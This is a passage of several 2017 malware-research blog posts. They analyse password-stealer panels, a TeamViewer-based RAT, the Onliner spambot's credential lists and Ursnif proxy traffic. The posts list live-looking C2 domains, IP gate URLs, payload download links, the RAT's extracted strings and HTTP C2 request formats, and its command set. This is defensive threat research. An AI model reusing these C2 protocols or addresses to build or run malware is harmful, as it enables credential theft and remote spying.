Almost 2 of these malware are open sources. Pony and Agent Tesla has leaked sometimes ago. I draw your attention on these very lame malware. Here, they used the default configuration for Pony and Agent Tesla. The gate is by default, the web requests are by default etc. Take a look at how, in 2017, crooks used old lame Pony shits to infects people protected by "next gen anti virus".</br>
I've work in AV industry, I know how it's difficult to implement protections on Windows without false positive (thanks to all the fucking third party software developed by n00b) but COME ONE! PONY! </br>
<center><iframe src="https://giphy.com/embed/MwOuiiTfWfWgM" width="474" height="280" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center></br>
Put a global hook (even in userland LOL) and blocks every POST request on gate.php and white list browsers ! Trust me you will catch 80% of the cyber crime... You can even propose a premium version which blocks POST on fre.php and you can be the best AV on Gartner...</br>
</br>
</br>
<h1>kns1.al, fav.al and ddf.al as panel C&C since 2015</h1>
These crooks use only a few domains during the operation, and split different victims on different sub domains.</br>
Each sub domains are configured with 2 panels, Formbook and {Pony|Agent Tesla}. In the past this gang used Zeus too</br>
dff.al was known since almost 2015-08-24 (bd1e28f55b2b335e27762425ebc70ffe17d468d7896bf2869bc0e5fa3e4220e2 - (hxxp://files1.ddf.al/bin1.exe)
</br>
This looks like a kind of password stealer as service infrastructure. </br>
<pre>
+-----------------------------+-----------------------------+
| | |
fav.al ddf.al kns1.al
| | |
| | |
401.fav.al d1.ddf.al bin1.kns1.al
402.fav.al dbr.ddf.al bon1.kns1.al
403.fav.al f1.ddf.al byn1.kns1.al
404.fav.al files.ddf.al dan1.kns1.al
ali1st.fav.al files1.ddf.al dan1-d.kns1.al
cent1.fav.al frank1.ddf.al dave1.kns1.al
char2.fav.al 111.dff.al denko1.kns1.al
charles1.fav.al owe1.ddf.al dinu1.kns1.al
charles1-s.fav.al owe2.ddf.al gt1.kns1.al
daniel1.fav.al owe3.ddf.al jeff1.kns1.al
dave1.fav.al legend1.ddf.al jones1.kns1.al
db.fav.al s1.ddf.al ld1.kns1.al
dfg2.fav.al ld1files.kns1.al
dfg3.fav.al nasty1.kns1.al
dfg2-s.fav.al sailheats2.kns1.al
dino1.fav.al sheats1.kns1.al
ebu1.fav.al swain1.kns1.al
gabriel1-st.fav.al swain2.kns1.al
g1.fav.al tunapy1.kns1.al
g2.fav.al wal1.kns1.al
g3.fav.al wal2.kns1.al
gr2-s.fav.al wal3.kns1.al
heat1.fav.al wal4.kns1.al
idino2.fav.al wal5.kns1.al
ll1.fav.al
nwam1.fav.al
oct1.fav.al
oct3-st.fav.al
oct4-st.fav.al
pat1st.fav.al
patrick1.fav.al
riv1.fav.al
sail1st.fav.al
sail2st.fav.al
senator1st.fav.al
skadams1.fav.al
swaindino1.fav.al
t2st.fav.al
t3st.fav.al
t4st.fav.al
upd1.fav.al
upd3.fav.al
wal1.fav.al
</pre>
Some panels example from <a href="cybercrime-tracker.net" >CCT</a>:</br>
<center>
<a href="http://cybercrime-tracker.net/index.php?search=ddf.al"><img src="https://i.imgur.com/SaHu88a.png" height=130px;/></a></br></br>
<a href="http://cybercrime-tracker.net/index.php?search=fav.al"><img src="https://i.imgur.com/unvryBj.png" height=700px;/></a></br></br>
</center>
</br>
This team don't use mass spreading, they select specific victims (we will understand how later), I have seen ~110 victims dispatched in many sub domains. They use password stealer for grabbing access on company and try to steal money.</br>
Password stealer are only one part of their business. During data analysis I have seen that they also used Phishing, scam and CVV laundering.
</br></br>
<h1>An inside view</h1>
There is a repetitive behavior with lame botmaster. In many case they infect themselves with the malware. </br>
I suspect 2 behaviours behind that:
<ul>
<li>The botmaster wants know if everything is okay with the botnet and the self-infection is used as monitoring</li>
<li>The botmaster is a n00b</li>
</ul>
</br>
I think for this case, it's both :).</br>
On one panel, a victim appears to be one admin behind those Formbook & Agent Tesla panels.</br></br>
<a href="https://i.imgur.com/XUyqYUs.jpg"><img src="https://i.imgur.com/XUyqYUs.jpg" height=600px /></a></br>
</br>
This guy stayed infected from 09/13/2017 to 09/22/2017, I'll try to use the collected data to understand how he works and how are used the stolen data. Notice that doxing is not the point here.</br></br>
<h1>Autopwn</h1>
<h2>Victims</h2>
As the screenshots shows, victims seems not really targeted, they look for small business easy to hack:</br>
<a href="https://i.imgur.com/GrWPULH.jpg"><img src="https://i.imgur.com/GrWPULH.jpg" height=600px /></a></br>
</br>
They used already pwned email inboxes for spreading password stealer through fake DocuSign notice:</br>
<a href="https://i.imgur.com/J6YiXFt.jpg"><img src="https://i.imgur.com/J6YiXFt.jpg" height=600px /></a></br>
With filename like "RBL-5019.Jpg,2800 PSI,1450 RPM.Jpg.exe" (81962cbfd51b64b51eeb4110ef139fd3c2791965621bf7ee65a422974a6ec4a1) or "Desktop.zip" (dfdc0b9e2cffead30a77bfffad6fb621f6eccaf6f5ace4b1d46bfe7b141a6028).</br>
</br>
After stealing passwords, this admin spy on victims activities and discuss with other people on how he can hijack money: </br>
<a href="https://i.imgur.com/Gl7go4N.jpg"><img src="https://i.imgur.com/Gl7go4N.jpg" height=600px /></a></br></br>
<a href="https://i.imgur.com/0kDItpf.jpg"><img src="https://i.imgur.com/0kDItpf.jpg" height=600px /></a></br></br>
The majority of victims came from China and USA:</br>
<a href="https://i.imgur.com/ZSPmxdU.jpg"><img src="https://i.imgur.com/ZSPmxdU.jpg" height=600px /></a></br></br>
In this panel we can see 17 victims, after grabbing all the panels I have counted 101 victims</br></br>
<h2>Admin opsec</h2>
After a quick look we can easily understand that this guy looks like another Nigerian phishers. They often don't have any opsec, they have facebook account with cash photo etc because they know that there is no law or resources for arresting them.</br>
</br>
This is the desktop of this guy:</br>
<a href="https://i.imgur.com/WxlfqHi.jpg"><img src="https://i.imgur.com/WxlfqHi.jpg" height=600px /></a></br></br>
He uses hacked RDPs and socks proxies for hiding his IP:</br>
<a href="https://i.imgur.com/PhOM4Iw.jpg"><img src="https://i.imgur.com/PhOM4Iw.jpg" height=600px /></a></br></br>
</br>
Another interesting fact, apparently this guy doesn't really know how malware works. In the conversation below you can see a "MASTER" botmaster angry because somebody uploads malware sample on VirusTotal, and our guy apologies:</br>
<center><a href="https://i.imgur.com/jgcVYR0.png"><img src="https://i.imgur.com/jgcVYR0.png" height=600px /></a></center></br></br>
<center><a href="https://i.imgur.com/iYX6PBO.png"><img src="https://i.imgur.com/iYX6PBO.png" height=600px /></a></center></br></br>
I have also seen that they used ICQ, Jabber and Skype to communicate. On the same day and with the same person, they switch between 3 softwares and they quite never used OTR.
</br>
</br>
<h1>Samples</h1>
The autopwned guy seems to have the ability to crypt malware. Quite every sample I've found has the same lame <a href="https://r3mrum.wordpress.com/2017/06/07/defeating-the-vb5-packer/"> VB5 packer</a></br>
<center><a href="https://i.imgur.com/d4HVYX5.png"><img src="https://i.imgur.com/d4HVYX5.png" height=600px /></a></center></br></br>
Some samples:
<ul>
<li>15775abe5573192d8abe6fc03240ef8d0afc94bbae22df5f940a789146295ebb - Agent Tesla - t1st.fav.al/st/post.php</li>
<li>81962cbfd51b64b51eeb4110ef139fd3c2791965621bf7ee65a422974a6ec4a1 - Agent Tesla - t4st.fav.al/st/post.php</li>
<li>f1b15760d728dc24cd87339be20cc4fe14359bf810f6866b3e21d7ade25846ed - Pony - riv1.fav.al/ddob/gate.php</li>
</ul>
(I cannot find any formbook sample :/)
</br>
</br>
<h1>Conclusion</h1>
This kind of autopwn allows us to better understand how criminals works, how they can make a lot of money with low investments.</br></br>
This is far from APTs but the consequences are serious too. We seriously saw a lot of cases like this one, every week on public sandboxes or support forums. This is a big impunity industry of money stealing. I'm pretty sure that this guy is not a developer or system administrator. He doesn't know how a keylogger works, he is just one guy part of a big community of panels operators.</br>
I understand that it's difficult to stop these criminals because of different countries law but we can maybe still make an effort on lame malware detection, no?</br></br>
<center><iframe src="https://giphy.com/embed/3oz8xWM9VHFMduH91S" width="480" height="348" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center>Benkow_http://www.blogger.com/profile/00709869309686004611noreply@blogger.comtag:blogger.com,1999:blog-330713861169915021.post-24361904402020133802017-11-26T09:31:00.000-08:002017-12-01T04:40:03.953-08:00Rules #22 - Copypasta is made to ruin every last bit of originalityHi,</br>
3 months since the last blogpost, it's time for an update \o.</br>
</br>
By looking at some public sandbox feeds (ping <a href="https://twitter.com/fumik0_">@fumik0_</a>) I've found an unusual patterns, reminding me old stuff:</br>
<code>
[+] e2dbbc71f807717a49b74d19c155a0ae9cce7d6e74f24c63ea5d0ed81ddb24d6 GET -> rpc2.gdn/start/includes/tasks.php?hwid=71D7D653-460A-8BE7-264F6AF5</br>
[+] e2dbbc71f807717a49b74d19c155a0ae9cce7d6e74f24c63ea5d0ed81ddb24d6 POST -> rpc2.gdn/start/inc.php/start/inc.php</br>
[+] 0c4d34cd4a11960ff3f7d205a0196084700f8d6f171ea052f8c9563f9ddc2e2e GET -> rpc2.gdn/start/includes/tasks.php?hwid=49C78CBD-165E-D0CF-474D92B</br>
[+] 0c4d34cd4a11960ff3f7d205a0196084700f8d6f171ea052f8c9563f9ddc2e2e POST -> rpc2.gdn/start/inc.php/start/inc.php</br>
</code>
</br>
This is a "rat" (I don't know the name) that uses TeamViewer for spying on victims. </br>
<center><iframe src="https://giphy.com/embed/7NaMJtCu6x5Xa" width="480" height="346" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center>
</br></br>
<h1>Panel overview</h1>
Let's start with a usual panel overview.</br>
The interface is very simple, main page (click to enlarge):</br>
<center><a href="https://i.imgur.com/VIaJolj.png"><img src="https://i.imgur.com/VIaJolj.png" height=650px;/></a></center> </br>
With that, the botmaster can see when somebody is connected to the infected machine or not, if he has webcam or mic and basics system information.</br>
There was 125 bots in this CNC. </br>
The only other page is a quick settings:</br>
<center><a href="https://i.imgur.com/qLj2xcZ.png"><img src="https://i.imgur.com/qLj2xcZ.png" height=300px;/></a></center></br>
This is very basic but enough for spying on people.<br></br>
Now look at the interesting part: the binary.
</br>
</br>
<h1>TeamViewer_Test_Pub</h1>
The sample came from email with an attachment named probably "invoice.js" (e2dbbc71f807717a49b74d19c155a0ae9cce7d6e74f24c63ea5d0ed81ddb24d6) that drops the RAT via <code>store4caroption-support.info/KKK.exe</code> (<a href=http://vxvault.net/ViriFiche.php?ID=36640">0c4d34cd4a11960ff3f7d205a0196084700f8d6f171ea052f8c9563f9ddc2e2e</a>) </br></br>
The sample is a big package used to deploy TeamViewer and the RAT in <code>%APPDATA\WebNet\</code> as hidden files:</br>
<center><a href="https://i.imgur.com/LhbRAwP.png"><img src="https://i.imgur.com/LhbRAwP.png" height=350px;/></a></center></br>
SensApi.dll (833ff902452e5fb10b39ef90c2f1ec96beb0d8d0486dc378eb07c10b3672276c) is the RAT controller.</br>
A quick static analyze with PEBear show us that this dll as 4 exports:</br>
<center><a href="https://i.imgur.com/fqU1jAX.png"><img src="https://i.imgur.com/fqU1jAX.png" height=170px;/></a></center>
<ul>
<li>Entrypoint</li><li>IsDestinationReachableA</li><li>IsDestinationReachableW</li><li>isNetworkAlive.</li>
</ul>
IsDestinationReachableA, IsDestinationReachableW and isNetworkAlive are just wrapper to sensApi.dll (the real one, note the rat :)</br>
<center><a href="https://i.imgur.com/EGYB2cc.png"><img src="https://i.imgur.com/EGYB2cc.png" height=410px;/></a></center> </br>
Before jumping into the EntryPoint let's have a quick look at the strings:</br>
<code>
rpc2.gdn</br>
num1.gdn</br>
process call create "%s"</br>
runas</br>
wmic</br>
TV started from Admin!!!</br>
uac</br>
This OS is not supported!!!</br>
\Policies\System</br>
\CurrentVersion</br>
\Windows</br>
\Microsoft</br>
Software</br>
%s%s%s%s%s</br>
EnableLUA</br>
Off</br>
High (Always Notify)</br>
Medium (Default Notification)</br>
Low (Default Notification)</br>
N/A</br>
error args</br>
Request successfully!!!</br>
cmdshow</br>
cmd</br>
COMSPEC</br>
/C</br>
run error</br>
wait...</br>
error</br>
closed. exitcode: %d (%s)</br>
tasklist</br>
(x64)</br>
(Win32)</br>
%s PID:%d%s</br>
plugin_start</br>
tiff</br>
plugin_del</br>
%s\%s.%s</br>
admin</br>
Yes</br>
UAC LVL: %s</br>
Elevated: %s</br>
RunAsAdmin: %s</br>
AdminGroup: %s</br>
webcam</br>
mic</br>
device is missing</br>
device is available</br>
off</br>
*.tiff</br>
Command not found!!!</br>
Error</br>
%s%s%s</br>
%06lX-%04lX-%04lX-%06lX</br>
%s%s</br>
HTTP/1.0</br>
Windows Server 2016</br>
Windows 10</br>
Windows Server 2012 R2</br>
Windows 8.1</br>
Windows Server 2012</br>
Windows 8</br>
Windows Server 2008 R2</br>
Windows 7</br>
Windows Server 2008</br>
Windows Vista</br>
Windows XP x64</br>
Windows Server 2003</br>
Windows XP</br>
Windows 2000</br>
unknown</br>
TeamViewer</br>
/start/includes/tasks.php?hwid=</br>
hwid=%s</br>
Content-Type: application/x-www-form-urlencoded</br>
start/includes/act_user.php</br>
hwid=%s&tv_id=%s&tv_pass=%s</br>
start/includes/pass_tv.php</br>
uuid=%s&tv_id=%s&tv_pass=%s&winver=%s&username=%s&webcam=%sµ=%s</br>
start/inc.php</br>
\start</br>
.exe</br>
open</br>
IsDestinationReachableA</br>
SensApi.dll</br>
IsDestinationReachableW</br>
IsNetworkAlive</br>
SOFTWARE\Microsoft\Windows\CurrentVersion\Run</br>
TeamViewer_Desktop.exe</br>
Windows Core Services</br>
%s\%s</br>
.log</br>
.txt</br>
.tmp</br>
resource DLL</br>
TeamViewer</br>
TV_Marker</br>
TVWidget</br>
ATL:00BDE7D8</br>
ATL:00BE38B8</br>
</code></br>
This binary seems very verbose with some recurrent patterns like "!!!". </br>
I don't think it's common for skid to deal with TeamViewer so before reversing let's have a look on Google if the dev hasn't copy paste some functions from stackoverflow.</br>
By searching strings like "High (Always Notify)" I've found some matching source code from a curious <a href="https://github.com/stonepans/TeamViewer_Test_Pub">Github account</a>:</br>
<center><a href="https://i.imgur.com/1cGiXSd.png"><img src="https://i.imgur.com/1cGiXSd.png" height=400px;/></a></center> </br>
<center><a href="https://i.imgur.com/BSB2qYt.png"><img src="https://i.imgur.com/BSB2qYt.png" height=650px;/></a></center> </br>
<h2> Commands</h2>
After looking deeper in this github account and in the RAT, it look like the RAT is a fork, or an update of the source code in the github account.</br>
We can found a lot for similar functions: (click to enlarge)</br>
<center><a href="https://i.imgur.com/SpSUNsB.png"><img src="https://i.imgur.com/SpSUNsB.png" height=540px;/></a></center></br>
<center><a href="https://i.imgur.com/3lNKlc5.png"><img src="https://i.imgur.com/3lNKlc5.png" height=350px;/></a></center></br>
</br>
The RAT execute commands from CNC via the function RunCmd() in main.cpp.
There is the available cmd in both version:</br>
<center>
<table border=1;>
<tr>
<td>Github</td><td>IDA</td><td>Details</td>
</tr>
<tr><td>setinterval</td><td></td><td>Set new interval for CNC ping</td></tr>
<tr><td>setserver</td><td></td><td>Set new CNC</td></tr>
<tr><td>setpass</td><td></td><td>Set new crypt config password</td></tr>
<tr><td>kill</td><td></td><td>Kill TeamViewer</td></tr>
<tr><td>runexe</td><td></td><td>Download and run exes</td></tr>
<tr><td>deldll</td><td></td><td>Delete dll</td></tr>
<tr><td>update</td><td></td><td>Update</td></tr>
<tr><td>rundll</td><td></td><td>Download and run dlls</td></tr>
<tr><td>reboot</td><td></td><td>Restart PC</td></tr>
<tr><td>poweroff</td><td></td><td>Shut down PC</td></tr>
<tr><td>restart</td><td></td><td>Restart Process</td></tr>
<tr><td>terminate</td><td></td><td>Kill process</td></tr>
<tr><td>mydir</td><td></td><td>Return current dir</td></tr>
<tr><td>admin</td><td>admin</td><td>Is process admin ?</td></tr>
<tr><td>tasklist</td><td>tasklist</td><td>Send tasks list</td></tr>
<tr><td>cmdwnd</td><td>cmdwnd</td><td>Run hidden cmd</td></tr>
<tr><td>cmd</td><td>cmd</td><td>Run cmd</td></tr>
<tr><td></td><td>uac</td><td>Re-run itself elevated via wmic process call create</td></tr>
<tr><td></td><td>plugin_start</td><td>Download, copy as .tiff and run an exe</td></tr>
<tr><td></td><td>plugin_del</td><td>Delete a file</td></tr>
<tr><td></td><td>webcam</td><td>Webcam on/off</td></tr>
<tr><td></td><td>mic</td><td>Mic on/off</td></tr>
</table>
</center>
As you can see, only a few commands are copied from the github code. The major modification are around dealing with elevated process / UAC (because the original code seems really old).</br>
</br>
<h2>CNC communication</h2>
The in the wild rat seems to have a different way to communicate with CNC. It communicate over HTTP in plain text (The github version used obfuscated HTTP requests). </br>
<ul>
<li><code>/includes/tasks.php - GET hwid=%s</code></li>
<li><code>/includes/act_user.php - POST hwid=%s&tv_id=%s&tv_pass=%s</code></li>
<li><code>/includes/inc.php - POST uuid=%s&tv_id=%s&tv_pass=%s&winver=%s&username=%s&webcam=%s&mic=%s</code></li>
</ul>
</br>
There is 2 domains as CNC: rpc2.gdn and num1.gdn
</br>
<h2>Notes</h2>
The Teamviewer part and the global architecture of the code are the same but that "in the wild" version looks like an updated light version.</br>
This is a very basic malware but it work and it's very easy to use.</br></br>
The Readme.md of the github version mention a forum post: <code>http://ander-pub.cc/forum/threads/isxodniki-skrytogo-teamviewer.73/</code> that is actually down. If someone here has more information about this forum I'm very curious :)</br>
</br>
<h1>Victims overview</h1>
In this campaign, crooks are targeting small company in different country (CN, AU, US, RU...). </br>
I've found call centers, accounting etc.</br>
Example of call center:</br>
<center><a href="https://i.imgur.com/YE9qkpP.png"><img src="https://i.imgur.com/YE9qkpP.png" height=500px;/></a></center></br>
<center><a href="https://i.imgur.com/TthQp3P.png"><img src="https://i.imgur.com/TthQp3P.png" height=400px;/></a></center></br>
I don't think that victims are targeted by country but more by business or "money capacity" </br>
</br>
<h1>Conclusion</h1>
I don't know if it's a fork or a copy pasta but i'm curious to know the story behind this malware and this campaign.</br>
</br>
<center><iframe src="https://giphy.com/embed/jmeAW1a0p3IR2" width="480" height="271" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center></br>
Code not packed, few victims, screencasting, all these stuff reminds me a targetted attack more than typical mass cybercrime.</br>
</br>
<h1>Yara rules</h1>
<script src="https://pastebin.com/embed_js/H1hmdvPx/noheader"></script></br>
Happy Hunting !
Benkow_http://www.blogger.com/profile/00709869309686004611noreply@blogger.comtag:blogger.com,1999:blog-330713861169915021.post-89308488646159484432017-08-29T00:48:00.000-07:002019-05-18T04:10:01.020-07:00From Onliner Spambot to millions of email's lists and credentialsHey!
It's time for another writeup about spambot. </br>
Here I will explain how I have found millions of emails and credentials on a spambot server and why your creds can be in these databases.</br>
<blockquote class="twitter-tweet" data-lang="fr"><p lang="en" dir="ltr">Processing the largest list of data ever seen in <a href="https://twitter.com/haveibeenpwned">@haveibeenpwned</a> courtesy of a nasty spambot. I'm in there, you probably are too.</p>— Troy Hunt (@troyhunt) <a href="https://twitter.com/troyhunt/status/902084044220809216">28 août 2017</a></blockquote>
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script>
</br>
I have written a lot about spambot on this blog for many reason. Spambots are often ignored by researchers and I don't understand why.</br>
In a successful cybercrime campaign there are different parts, the final payload is important but the spam process is very critical too.</br>
Some malware campaigns like Locky are successful also because the spamming process works well.</br>
This case is a good example :).</br>
</br>
<h2>Spam the world</h2>
<iframe src="https://giphy.com/embed/V4eDyfpmUGIJW" width="475" height="480" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></br>
As introduction, we will have a look at what is a spambot, why crooks use them and why they need huge list of credentials.</br>
In the past, it used to be easier for attackers to send mass spams: they just had to scan the Internet to find vulnerable SMTP server (with weak passwords or in <a href="https://www.spamhaus.org/news/article/706/the-return-of-the-open-relays">Open Relay mode</a>) and use them to send Spams.</br>
However, nowadays, it's more complicated. There are a lot of anti spam companies, products or firewalls. Most of the open relays are blacklisted and the attackers have to find another way to send mass spams.</br>
Among the available options, I have seen 2 very common behaviour:
<h3>PHP Mailer</h3>
The most used tricks I have seen is to use compromised websites. For instance, this kind of spamming campaign has been used for a big <a href="https://thisissecurity.stormshield.com/2016/04/12/gamarue-loves-malicious-javascript-too/">Andromeda campaign</a>.</br>
The principle is simple:
<ul>
<li>The spammer hacks a lot (10k/20k) of websites (via well known vulnerabilities on Wordpress, Joomla, OpenCart or FTP/SSH bruteforce etc) or buy access to a lot of websites on a random shop</li>
<li>He uses these websites for hosting a <a href="https://pastebin.com/8W6FXnZz">PHP script</a> in charge of sending emails. </li>
<li>He controls all the websites via a software or a web panel and uses them to send spam</li>
</ul>
Due to the almost infinite number of out-of-date websites on the Internet, it's difficult to blacklist every websites and it's really easy to use them for the spammer.</br>
<h3>Malware spammer</h3>
The other common way to send spam is more brutal. Here, the attacker creates or buys a specifique malware used to infects people and send spams.</br>
The more the attacker infects people, the more he can distribute spams through different IPs.</br>
However, a random pwned Windows machine is not enought to send spam. For that, the attacker needs some email server (SMTP) credentials. This is where you can be concerned by Spambot :)</br>
<iframe src="https://giphy.com/embed/75MVAB30DXwnm" width="480" height="288" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></br>
Indeed, to send spam, the attacker needs a huge list of SMTP credentials. To do so, there are only two options: create it or buy it :D</br>
And it's the same as for the IPs: the more SMTP servers he can find, the more he can distribute the campaign.</br>
Lets go through an example to see how attackers create SMTP credentials lists:
<h2>Credentials: Spambots gasoline</h2>
I will take as an example the Onliner spambot. This spambot is used since at least 2016 to spread a banking trojan called Gozi. I have seen this spambot targeting specific countries like Italy, or specific business like Hotels.</br>
Some emails example:</br>
DHL notification:</br>
<iframe src="https://pastebin.com/embed_iframe/3XX0ZzXY/noheader" style="border:none;width:100%"></iframe>
</br>
Email targeting Hotel business:</br>
<iframe src="https://pastebin.com/embed_iframe/jP9PqmxJ/noheader" style="border:none;width:100%"></iframe>
</br>
If you're curious about this case, I have tried to give some details in 3 blog posts:
<ul>
<li><a href="https://benkowlab.blogspot.fr/2017/01/a-journey-inside-ursnif-campaign.html">A journey inside Gozi campaign</a></li>
<li><a href="https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html">Spambot safari #2 - Online Mail System</a></li>
<li><a href="https://benkowlab.blogspot.fr/2017/08/a-third-look-in-jsdropperursnif.html">A third look at JSDropper/Gozi campaign - Proxy Statistics</a></li>
</ul>
</br>
TL;DR: this malware, after infecting your machine, uses 2 modules:
<ul>
<li>A module in charge of sending spam</li>
<li>A module in charge of creating a huge list of SMTP credentials</li>
</ul>
</br>
To create the list, the attacker provides to the second module a list of emails and credentials like sales@cliffordanddrew.co.uk / 123456 or peter.warner@mcswholesale.co.uk / MysuperPass.</br>
Then, the module tries to send an email using this combinaison. If it works, credential are added to the SMTP list. Else, credentials are ignored.</br>
Thanks to free email services like outlook, gmail or your ISP, the attacker can suppose that a lot of people reuse the same password and use your outlook adress to send spam :)</br>
<a href="https://i.imgur.com/RAFhCU9.png"><img src="https://i.imgur.com/RAFhCU9.png" height=380px/></a></br>
It's difficult to know where those lists of credentials came from. I have obviously seen a lot of public leaks (like Linkedin, Baidu or with every passwords in clear text) but credentials can also came from phishing campaigns, credentials stealer malwares like Pony, or they can also be found in a shop. Somebody even show me a spambot with a SQL injection scanner which scan Internet, looks for SQLi, retrieves SQL tables with names like "user" or "admin".</br> </br>
Thanks to an open directory on the web server of the Onliner Spambot CNC, I was able to grab all the spamming data</br>
It's composed of ~40GB of emails, credentials or SMTP configuration.</br>
These data are composed of:
<ul>
<li>Huge lists of credentials like email:password (in clear text)</li>
<li>Huge lists of Emails to spam</li>
<li>Spambot configuration files</li>
</ul>
I have found around 80 millions credentials (unsorted, it's an estimation, I cannot deal with so big txt files).</br> One part (~2 millions) seems to come from a Facebook phishing campaign, those I have tested seems to be working and were not on HIBP.</br>
Therefore, it's difficult to say where did your credentials come from.
</br>
<iframe src="https://giphy.com/embed/3osxYc2axjCJNsCXyE" width="480" height="480" frameBorder="0" class="giphy-embed" allowFullScreen></iframe>
<h2>Making emails lists like a pro</h2>
Inside all these data, we can see a lot of emails (used for sending spam to). </br>
Because I have been following these guys for almost a year I'm able to explain how they built these lists.</br>
</br>
After looking at the spambot logs, I have seen that it was used to send fingerprinting spam. What does this mean?.</br>
Before starting a new malware campaign, the attacker used the spambot to send this kind of emails:</br>
<iframe src="https://pastebin.com/embed_iframe/7aWBMNmY/noheader" style="border:none;width:100%"></iframe>
If you look at the email you will see that inside this random spam, there is a hidden 1x1 gif. This method is well known in the marketing industry.</br>
Indeed, when you open this random spam, a request with your IP and your User-Agent will be sent to the server that hosts the gif. With these information, the spammer is able to know
when you have opened the email, from where and on which device (Iphone ? Outlook?...). </br>
At the same time, the request also allows the attacker to know that the email is valid and people actually open spams :).</br>
This is an example of a classification script found on one Onliner spambot server:</br>
<iframe src="https://pastebin.com/embed_iframe/ZLagdg3E/noheader" style="border:none;width:100%"></iframe>
</br>
Example of output :</br>
<iframe src="https://pastebin.com/embed_iframe/MDSbQtBj/noheader" style="border:none;width:100%"></iframe>
</br>
</br>
As a reminder: <b>DON'T OPEN SPAM!</b>
<h2>Conclusion</h2>
If you're a malware researcher, it's time to look deeper in the spambot business. It's a creative market which interracts with a lot of other cybercrime business.</br>
Around Spambot you will often found phisher, password stealer botmaster, website scanners, malware developers, dropper developers, payload hosters, and so on.</br>
The way is maybe short between the lame Pony you have received last month in a stupid .ace archive and a spambot that spread Gozi.</br>
</br>
<img src="https://i.imgur.com/4MxH2Vs.jpg"></br>
<h2>Annexe</h2>
</br>
Some urls found in spam configuration files:
<ul>
<li>hxxp://119.28.18.104/IMG_8026.zip</li>
<li>hxxp://21emb.com/IMG_0557.zip</li>
<li>hxxp://cielitodrive.com/2.docm</li>
<li>hxxp://cielitodrive.com/IMG_0557.zip</li>
<li>hxxp://dcipostdoc.com/3.docm</li>
<li>hxxp://fondazioneprogenies.com/1.docm</li>
<li>hxxp://fondazioneprogenies.com/IMG_7339.zip</li>
<li>hxxp://intesols.com/IMG_8026.zip</li>
<li>hxxp://jltl.net/IMG_8026.zip</li>
<li>hxxp://liyuesheng.com/Report_Bill_ID20039421.zip</li>
<li>hxxp://lopezdelaisidra.com/107490427.zip</li>
<li>hxxp://maikaandfriends.com/Report_Bill_ID20593601.zip</li>
<li>hxxp://mc-keishikai.com/Report_Bill_ID73086492.zip</li>
<li>hxxp://pacific-centre.com/IMG_8026.zip</li>
<li>hxxp://reliancemct.com/IMG_9647.zip</li>
<li>hxxp://resital.net/IMG_0557.zip</li>
<li>hxxp://speaklifegreetings.com/IMG_9647.zip</li>
<li>hxxp://tspars.com/087578952.zip</li>
<li>hxxp://usedtextilemachinerylive.com/IMG_9647.zip</li>
<li>hxxp://webtoaster.net/IMG_0273.zip</li>
<li>hxxp://whatisaxapta.com/5.docm</li>
<li>hxxp://womenepic.com/4.docm</li>
<li>hxxp://www.loidietxarri.com/Report_Bill_ID87793518.zip</li>
</ul>
</br>
Thanks to <a href="https://twitter.com/Hydraze">Hydraze</a> for reviewing \o/
Benkow_http://www.blogger.com/profile/00709869309686004611noreply@blogger.comtag:blogger.com,1999:blog-330713861169915021.post-6014990730707208352017-08-20T08:21:00.000-07:002017-12-01T04:41:31.807-08:00A third look at JSDropper/ursnif campaign - Proxy StatisticsHey </br>
</br>
I've already talk a lot about the <a href="https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html">Ursnif campaigns</a> against EU and mainly Italy spreaded by a JScript (you know, the jscript that contacts <code> /r6.php?cmd=p&id= / /l2.php?cmd=p&id= / /re.php?cmd=p&id= </code> etc) but 6 months after my last blogpost, crooks are still working and I have enough data for some cool statistics.
</br>
For the last 6 months I've collected access.log logs of one proxy used by this botnet. I'll try to details that here.</br>
There is no magic, I've just use Splunk :D</br>
</br>
</br>
As reminding, this campaign is used to spread Ursnif like that:</br>
<a href="https://i.imgur.com/Urjz5Ip.png"><img src="https://i.imgur.com/Urjz5Ip.png" height="270px"/></a>
</br>
In the same "Proxy server", you can found further "proxy scripts" (usually 1 script / campaign) and those scripts looks like :</br>
<a href="https://i.imgur.com/oBTZJmS.png"><img src="https://i.imgur.com/oBTZJmS.png" height="170px"/></a>
</br>
So, I've retrieve access.log of one of these proxies and I've extract traffic relative to our case.</br></br>
<h1>Global</h1>
Some global statistics for 1 proxy:</br>
From February 2017 to August 2017</br>
<ul>
<li>
Total number of hits on all the proxy scripts: <b>924 021</b>
</li>
<li>
From <b>108 367</b> unique IPs
</li>
<li>
on 16 different PHP proxy scripts
</li>
</ul>
<table border=1>
<tr>
<td>Filename</td>
<td>Hits</td>
<td>First seen</td>
<td>url</td>
<td>Malware</td>
</tr>
<tr>
<td>/3E2s4R.php</td>
<td>610787</td>
<td>June</td>
<td>http://194.247.13.196/asus/</td>
<td>Onliner</td>
</tr>
<tr>
<td>/re.php</td>
<td>137352</td>
<td>June</td>
<td>http://94.177.196.246/loadere/gate.php</td>
<td>JSDropper</td>
</tr>
<tr>
<td>term.php</td>
<td>121669</td>
<td>February
</td>
<td>http://94.177.196.246/loader/gate.php</td>
<td>JSDropper</td>
</tr>
<tr>
<td>l2.php</td>
<td>52288</td>
<td>February
</td>
<td>http://109.120.142.156/loader2/gate.php</td>
<td>JSDropper</td>
</tr>
<tr>
<td>r4.php</td>
<td>1848</td>
<td>February
</td>
<td>http://109.120.142.156/loader4/gate.php</td>
<td>JSDropper</td>
</tr>
<tr>
<td>/0iSP0c.php
</td>
<td>7</td>
<td>June</td>
<td>http://194.247.13.222/tess/</td>
<td>Onliner</td>
</tr>
<tr>
<td>/130D0G.php
</td>
<td>7</td>
<td>June</td>
<td>http://194.247.13.222/tess/</td>
<td>Onliner</td>
</tr>
<tr>
<td>/1AtJai.php
</td>
<td>7</td>
<td>June</td>
<td>http://194.247.13.222/tess/</td>
<td>Onliner</td>
</tr>
<tr>
<td>/HTsGeg.php
</td>
<td>7</td>
<td>June</td>
<td>http://194.247.13.222/tess/</td>
<td>Onliner</td>
</tr>
<tr>
<td>/J65oH1.php
</td>
<td>7</td>
<td>June</td>
